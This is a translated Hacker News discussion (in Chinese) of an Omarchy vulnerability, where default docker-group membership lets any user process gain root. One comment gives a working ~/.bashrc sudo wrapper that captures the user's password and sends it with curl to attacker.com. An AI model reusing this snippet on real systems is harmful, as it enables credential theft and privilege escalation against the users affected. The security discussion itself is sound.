Omarchy 默认配置让所有进程提权至 Root
Omarchy: Any User Process Can Escalate to Root
Omarchy 的默认 Docker 配置存在严重安全漏洞,导致桌面会话中的任何用户进程都能无需密码或 sudo 直接提权至 Root。问题根源在于默认用户被加入了 docker 组,而该组权限等同于 Root。这意味着浏览器、编辑器甚至 AI 编程代理等普通应用一旦受损,攻击者即可完全控制机器。该配置是默认开启的,且文档描述具有误导性,让用户误以为已处于无 Root 模式。受影响版本需立即更新至 4.0.1。作者建议开发者转向使用无需 Root 权限的 Podman 来替代 Docker,以从根本上规避此类风险。
一个普通用户应用的妥协,可能立即演变为整台机器的完全沦陷。
HN 评论区
473- concinds
几天前有人发现他们正在把 USB 描述符直接灌进 shell 里。
https://github.com/omacom/omarchy/commit/9285b19d6a72eba3df8...
别用那种靠“氛围感”(vibecoded)搞出来的发行版。不管他们是修了这个还是那个漏洞,也不管你是否在意某个特定漏洞,这都不合逻辑。你当初转投 Linux 不就是因为这个吗,记得吗?
- thehamkercat
我觉得大家不该盲目跟风那些在媒体或 YouTube 上被吹上天的发行版,cachyOS 之前就有过一波类似的狂热,现在轮到 Omarchy 了。
(例如:NetworkChuck, Primeagen?还有其他人)
另外,现在的 Arch Linux 用 archinstall [1] 安装已经容易多了,所以我不确定你真需要在这个之上再加一层带有强烈个人偏见的封装。
- mike_hearn
Linux 不像 macOS,它没有任何真正有效的桌面沙箱架构。所以这某种程度上只是“安全剧场”。如果你运行了恶意程序,它可以篡改你的 PATH,或者利用应用程序中的本地漏洞,达到控制所有关键内容的地步(而 root 权限通常做不到这一点)。比如,它可以直接在 ~/.bin/.hidden-shell 里放一个自定义 shell,然后重新配置终端模拟器去运行它。
所以这种所谓的“漏洞”似乎没那么重要。如果你在 Linux 上以普通用户身份运行代码,那它就能控制你。
macOS 的情况则完全不同。普遍存在的代码签名机制为所有应用赋予了由内核强制执行的稳定身份,它们很难逃脱。内核随后可以对任何运行的应用施加沙箱策略,无论它是如何安装的,例如阻止应用翻找 ~/Documents 或监控你的屏幕。权限是可编辑的且保证持久有效,包括跨升级。而且 root 权限被削弱了,所以获取它几乎没什么意义,它存在主要是为了 UNIX 兼容性。
不幸的是,在 Linux 上实现类似 Apple 的架构会非常困难。
- lrvick
公平地说,在任何主流 Linux 发行版上,恶意软件升级到 root 权限都很容易,因为 sudo 完全是安全剧场。
恶意软件只需要把这段代码放进 ~/.bashrc 然后等着就行:
function sudo () {
realsudo=$(which sudo)
read -r -s -p "[sudo] password for $USER: " password
echo "$USER: $password" | \
curl -F 'p=<' https://attacker.com >/dev/null 2>&1
$realsudo -S <<< "$password" -u root bash -C "exit" >/dev/null 2>&1
$realsudo "${@:1}"
}
- exitb
这确实不太好,但我不确定这是否应该被描述为 Omarchy 特有的问题,因为把普通用户加入 docker 组是一种非常常见的配置。
- moojacob
Omarchy 让我开始怀疑自己是不是喜欢 Rails 了,因为它简直……烂透了?
它居然预装了该死的 ZOOM。我觉得 Windows 的臃肿也没那么严重。
如果这能让人们开心,那让他们开心吧。这些尝试它的人要是去试试 Fedora Workstation,估计会更惊讶(“按 Windows 键就能显示所有打开的窗口?这好太多了”)。
- trentnix
Docker 配置问题已经被报告,并且已经迅速做出了更改来解决。听起来这恰恰是系统运作良好的一个绝佳例子。
Omarchy 看起来像是我这样的开发者测试 hyprland 和写代码的简单途径。它看起来也是我让孩子们接触电脑的好方法,因为那里有一个现成的代理工具集可以帮助他们管理机器和使用免费软件,即使是那些有点晦涩难用的东西。
我对人们对此感到愤怒感到困惑,但随后我想起来,我再也不在乎那些守门人怎么想了。
- darkwi11ow
为什么不使用 rootless podman?现在是 2026 年不是 2016 年,Podman 现在的表现比 Docker 好多了。
- hashstring
任何真正重视安全的人都不会碰 Omarchy。
实际上每个发行版都遭受着关键本地提权(LPE)的困扰,但至少有个底线。
Omarchy 是个一团糟的产物,它存在的原因就像为什么我们的咖啡馆里会有抹茶,以及为什么我们的集体记忆里有肽类激素一样。
- pkulak
哇……这真的很有说明性。这不是什么生僻的失误。Docker 的安装页面上有一个巨大的章节专门解释这个问题。每个发行版 wiki 上的 Docker 部分都详细地讲解了这个问题。这基本上就是当初创建 Podman 的 80% 的原因。